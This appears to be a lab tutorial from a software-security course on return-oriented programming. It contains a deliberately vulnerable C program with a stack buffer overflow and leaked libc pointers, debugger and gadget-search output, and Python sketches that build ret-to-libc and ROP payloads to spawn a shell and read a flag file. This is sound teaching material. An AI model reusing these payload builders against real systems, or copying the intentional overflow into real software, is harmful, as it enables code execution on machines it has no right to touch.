==================================
Lec07: Return-oriented Programming
==================================

In this tutorial, we are going to learn about the basic concept of
return-oriented programming (ROP).

1. Ret-to-libc
==============

To make our tutorial easier, we assume there are code pointer leaks
(i.e., system() and printf() in the libc library).

------------------------------------------------------------
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void start() {
  printf("IOLI Crackme Level 0x00\n");
  printf("Password:");

  char buf[32];
  memset(buf, 0, sizeof(buf));
  /* intentional bug: reads up to 256 bytes into a 32-byte buffer */
  read(0, buf, 256);

  if (!strcmp(buf, "250382"))
    printf("Password OK :)\n");
  else
    printf("Invalid Password!\n");
}

int main(int argc, char *argv[])
{
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);

  /* leak a stack address and two libc code pointers */
  void *self = dlopen(NULL, RTLD_NOW);
  printf("stack : %p\n", &argc);
  printf("system(): %p\n", dlsym(self, "system"));
  printf("printf(): %p\n", dlsym(self, "printf"));

  start();

  return 0;
}
------------------------------------------------------------

  $ checksec ./target
  [*] '/home/lab/tut-rop/target'
      Arch:     i386-32-little
      RELRO:    Partial RELRO
      Stack:    No canary found
      NX:       NX enabled
      PIE:      No PIE (0x8048000)

Please note that NX is enabled, so you can place your shellcode
neither on the stack nor on the heap. The stack protector, however, is
disabled, which still allows us to launch a control-flow hijacking
attack.

  $ ./target
  stack : 0xffea0e00
  system(): 0xf7e5e310
  printf(): 0xf7e6b410
  IOLI Crackme Level 0x00
  Password:

Your first task is to exploit the buffer overflow and print out
"Password OK :)". (How could you find the pointer to "Password OK :)"?)

Your payload should look like this:

  [buf  ]
  [.....]
  [ra   ] -> printf
  [dummy]
  [arg1 ] -> "Password OK :)"

When printf() is invoked, "Password OK :)" will be treated as its
first argument. As this exploit returns to a libc function, this
technique is often called "ret-to-libc".

2. Understanding module
=======================

Let's get a shell out of this vulnerability.
To get a shell, we are going to use the system() function (try
'man system' if you are not familiar with it).

Like the above payload, you can easily place the pointer to system()
by replacing printf() with system().

  [buf  ]
  [.....]
  [ra   ] -> system
  [dummy]
  [arg1 ] -> "/bin/sh"

But what's the pointer to "/bin/sh"? In fact, typical process memory
(and libc) contains lots of such strings (e.g., various shells). Think
about how the system() function is implemented; it essentially calls
fork()/execve() on "/bin/sh" with the provided argument.

gdb-pwndbg provides a pretty easy interface to search for a string in
memory:

  $ gdb-pwndbg ./target
  ...
  > search "/bin"
  libc-2.19.so    0xf7f80d4c das    /* '/bin/sh' */
  libc-2.19.so    0xf7f82790 das    /* '/bin:/usr/bin' */
  libc-2.19.so    0xf7f82799 das    /* '/bin' */
  libc-2.19.so    0xf7f82ccd das    /* '/bin/csh' */
  ...

There are a bunch of strings you can pick to feed to the system()
function as an argument. Note that all of these pointers differ across
executions because of ASLR on the stack/heap and libraries.

Our goal is to invoke system("/bin/sh"), like this:

  [buf  ]
  [.....]
  [ra   ] -> system (provided: 0xf7e5e310)
  [dummy]
  [arg1 ] -> "/bin/sh" (searched: 0xf7f80d4c)

Unfortunately though, these numbers keep changing. How can we infer
the address of "/bin/sh" required for system()? As you've learned from
the 'libbase' challenge in Lab06, ASLR does not randomize the offsets
inside a module; it just randomizes the base address of the entire
module (why though?)

  0xf7f80d4c (/bin/sh) - 0xf7e5e310 (system) = 0x122a3c

So in your exploit, by using the address of system(), you can
calculate the address of "/bin/sh" (0xf7f80d4c = 0xf7e5e310 + 0x122a3c).

Try?

By the way, where is this magic address (0xf7e5e310, the address of
system()) coming from? In fact, you can easily compute it by hand.
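
The offset arithmetic for "/bin/sh" can be sketched in a few lines of
Python. This is only an illustration built on the sample addresses
printed above; the helper names (binsh_from_leak, p32) are made up for
this sketch, and the constant offset only holds for the same libc
build that was inspected in the debugger.

```python
import struct

# Values copied from the sample run above; they change on every execution.
LEAKED_SYSTEM = 0xf7e5e310   # printed by ./target as "system():"
SEEN_BINSH = 0xf7f80d4c      # found with `search "/bin"` in that same run

# The distance between two objects of one module stays constant under ASLR.
BINSH_FROM_SYSTEM = SEEN_BINSH - LEAKED_SYSTEM


def binsh_from_leak(system_addr):
    """Derive the address of "/bin/sh" from a freshly leaked system()."""
    return (system_addr + BINSH_FROM_SYSTEM) & 0xffffffff


def p32(value):
    """Pack a 32-bit little-endian word, ready to be placed in a payload."""
    return struct.pack("<I", value & 0xffffffff)


print(hex(BINSH_FROM_SYSTEM))
print(hex(binsh_from_leak(LEAKED_SYSTEM)))
```

In a real exploit, the argument to binsh_from_leak() would be the
value parsed from the "system():" line of the current run, not the
constant used here.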
Try "vmmap" in PEDA:

  > vmmap
  LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
  0x56555000 0x56556000 r-xp     1000 0      /home/lab06/tut-rop/target
  0x56556000 0x56557000 r--p     1000 0      /home/lab06/tut-rop/target
  0x56557000 0x56558000 rw-p     1000 1000   /home/lab06/tut-rop/target
  0xf7e1d000 0xf7e1e000 rw-p     1000 0
  0xf7e1e000 0xf7fc9000 r-xp   1ab000 0      /lib/i386-linux-gnu/libc-2.19.so
  0xf7fc9000 0xf7fcb000 r--p     2000 1aa000 /lib/i386-linux-gnu/libc-2.19.so
  0xf7fcb000 0xf7fcc000 rw-p     1000 1ac000 /lib/i386-linux-gnu/libc-2.19.so
  ...

The base address (the start of the mapped region) of libc is
'0xf7e1e000'; the "x" in the "r-xp" permission tells you that it is an
eXecutable region (i.e., code).

Then, where is system() in the library itself? As these functions are
exported for external use, you can parse the ELF format like below:

  $ readelf -s /lib/i386-linux-gnu/libc-2.19.so | grep system
     243: 0011b8a0    73 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
     620: 00040310    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
    1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

0x00040310 is the beginning of the system() function inside the libc
library, so the library's base address plus 0x00040310 should be the
address we observed previously.

  0xf7e1e000 (base) + 0x00040310 (offset) = 0xf7e5e310 (system)

Then, can you calculate the base of the library from the leaked
address of system()? And what's the offset of "/bin/sh" in the libc
module?

3. Simple ROP
=============

Generating a segfault after exploitation is a bit unfortunate, so
let's make the program terminate gracefully after the exploitation.
Our plan is to 'chain' two library calls, like this:

  system("/bin/sh")
  exit(0)

Let's think about what happens when system("/bin/sh") returns; that
is, when you exit the shell (type 'exit' or press C-c).

  [buf  ]
  [.....]
  [ra   ] -> system
  [dummy]
  [arg1 ] -> "/bin/sh"

Did you notice that the 'dummy' value is the last ip (instruction
pointer) at which the program crashed?
In other words, similar to stack overflows, you can keep controlling
the next return addresses by chaining them. What if we place the
address of exit() in 'dummy'?

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) system
  [ra       ] -------------------> 2) exit
  [old-arg1 ] -> 1) "/bin/sh"
  [arg1     ] -> 0

When system() returns, exit() will be invoked; you can even control
its argument as shown above (arg1 = 0).

Try? You should be able to find the address of exit() as in the
previous example.

Unfortunately, this chaining scheme stops after the second call. This
week, you will learn a more generic and powerful technique for
extending your payloads, so-called return-oriented programming (ROP).

Think about:

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) func1
  [ra       ] -------------------> 2) func2
  [old-arg1 ] -> 1) arg1
  [arg1     ] -> arg1

After func2(arg1), 'old-arg1' will be our next return address in this
payload. Here comes a neat trick, a pop/ret gadget.

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) func1
  [ra       ] ------------------> pop/ret gadget
  [old-arg1 ] -> 1) arg1
  [ra       ] -> func2
  [dummy    ]
  [arg1     ] -> arg1

In this case, after func1(arg1), it returns to the 'pop/ret'
instructions, which 1) pop 'old-arg1' off the stack and 2) return to
func2 (again!).

Although 'pop/ret' gadgets are everywhere (check any function!), there
is a useful tool that searches all interesting gadgets for you.

  $ ropper -f ./target
  ....
  0x0804901e: pop ebx; ret;
  ....

By using this 'gadget', we can keep chaining multiple functions
together like this:

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) func1
  [ra       ] ------------------> pop/ret gadget
  [old-arg1 ] -> 1) arg1
  [ra       ] -> func2
  [ra       ] ------------------> pop/pop/ret gadget
  [arg1     ] -> arg1
  [arg2     ] -> arg2
  [ra       ] ...

To invoke:

  func1(arg1)
  func2(arg1, arg2)

Try to invoke:

  printf("Password OK :)")
  system("/bin/sh")
  exit(0)

In fact, this is just the basic idea. After executing 'pop ebx; ret;',
you control the value of a register (ebx = arg1), which means you can
do a bunch of other things (e.g., invoking system calls).
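
The printf/system/exit exercise above can be laid out with two pop/ret
hops. The following is a minimal sketch, not a finished exploit: the
printf(), system(), "/bin/sh" and gadget addresses are the sample
values printed earlier, while EXIT, PASSWORD_OK and RA_OFFSET are
placeholders that do not come from this tutorial and must be replaced
with values you find yourself. The helper names p32 and call are
hypothetical.

```python
import struct


def p32(value):
    """Pack a 32-bit little-endian word, as the i386 stack expects."""
    return struct.pack("<I", value & 0xffffffff)


def call(func, args, next_ra):
    """One frame of the chain: [func][return address][arg1][arg2]..."""
    return p32(func) + p32(next_ra) + b"".join(p32(a) for a in args)


# Sample values from the outputs above (they differ per run and per build).
PRINTF = 0xf7e6b410
SYSTEM = 0xf7e5e310
BINSH = 0xf7f80d4c
POP_RET = 0x0804901e        # "pop ebx; ret;" as reported by ropper

# Placeholders, NOT taken from the tutorial: find the real values yourself.
EXIT = 0x41414141           # address of exit()
PASSWORD_OK = 0x42424242    # pointer to "Password OK :)"
RA_OFFSET = 44              # assumed distance from buf to the saved ra

chain = call(PRINTF, [PASSWORD_OK], POP_RET)   # pop skips arg1, ret -> system
chain += call(SYSTEM, [BINSH], POP_RET)        # pop skips arg1, ret -> exit
chain += call(EXIT, [0], 0x43434343)           # exit() never returns

payload = b"A" * RA_OFFSET + chain
print(len(payload))
```

Each pop/ret hop removes exactly one argument word, so a function
taking two arguments would need a pop/pop/ret gadget in the same slot.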
Not surprisingly, this kind of technique turns out to be Turing
complete (see our reference). You know what? Every gadget ends with
"ret", hence the name "return"-oriented programming.

4. Simple ROP
=============

Your job today is to chain a ROP payload:

  open("/proc/flag", O_RDONLY)
  read(3, tmp, 1024)
  write(1, tmp, 1024)

More specifically, prepare the payload:

  [buf      ]
  [.....    ]
  [ra       ] -> 1) open
  [pop2     ] --------------------> pop/pop/ret
  [arg1     ] -> "/proc/flag"
  [arg2     ] -> 0 (O_RDONLY)

  [ra       ] -> 2) read
  [pop3     ] ------------------> pop/pop/pop/ret
  [arg1     ] -> 3 (new fd)
  [arg2     ] -> tmp
  [arg3     ] -> 1024

  [ra       ] -> 3) write
  [dummy    ]
  [arg1     ] -> 1 (stdout)
  [arg2     ] -> tmp
  [arg3     ] -> 1024

1) tmp? Any writable place in the program will do (i.e., check vmmap).
2) "/proc/flag"? You can inject the string into the stack as part of
   your buffer input (i.e., use the leaked "stack" address).

Please exploit ./target-seccomp with your payload and submit the flag!
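
The open/read/write layout above can be assembled programmatically. A
minimal sketch under stated assumptions: every address in EXAMPLE is a
made-up number used only to exercise the function, buf_addr and
ra_offset are values you would have to measure in a debugger, and the
function name build_payload is hypothetical. The path string is
appended right after the chain, so its address follows from buf_addr.

```python
import struct


def p32(value):
    """Pack a 32-bit little-endian word."""
    return struct.pack("<I", value & 0xffffffff)


def build_payload(addr, buf_addr, ra_offset):
    """Lay out the three frames, then append "/proc/flag" after them.

    addr      -- dict with the open/read/write, pop2/pop3 and tmp addresses
    buf_addr  -- runtime address of buf[0] on the stack (assumption)
    ra_offset -- distance from buf[0] to the saved return address (assumption)
    """
    chain_len = (4 + 5 + 5) * 4                  # words per frame, 4 bytes each
    path_addr = buf_addr + ra_offset + chain_len

    chain = p32(addr["open"]) + p32(addr["pop2"])
    chain += p32(path_addr) + p32(0)             # "/proc/flag", O_RDONLY
    chain += p32(addr["read"]) + p32(addr["pop3"])
    chain += p32(3) + p32(addr["tmp"]) + p32(1024)
    chain += p32(addr["write"]) + p32(0xdeadbeef)  # dummy ra after write()
    chain += p32(1) + p32(addr["tmp"]) + p32(1024)
    assert len(chain) == chain_len

    return b"A" * ra_offset + chain + b"/proc/flag\x00"


# Made-up numbers, for illustration only.
EXAMPLE = {
    "open": 0x11111111, "read": 0x22222222, "write": 0x33333333,
    "pop2": 0x44444444, "pop3": 0x55555555, "tmp": 0x66666666,
}
payload = build_payload(EXAMPLE, buf_addr=0xffea0d00, ra_offset=44)
print(len(payload))
```

The whole payload must fit into the 256 bytes that read() accepts;
with the assumed offset of 44 it is 111 bytes long. The file
descriptor 3 is the value used in the layout above and presumes that
only stdin, stdout and stderr are open when open() is called.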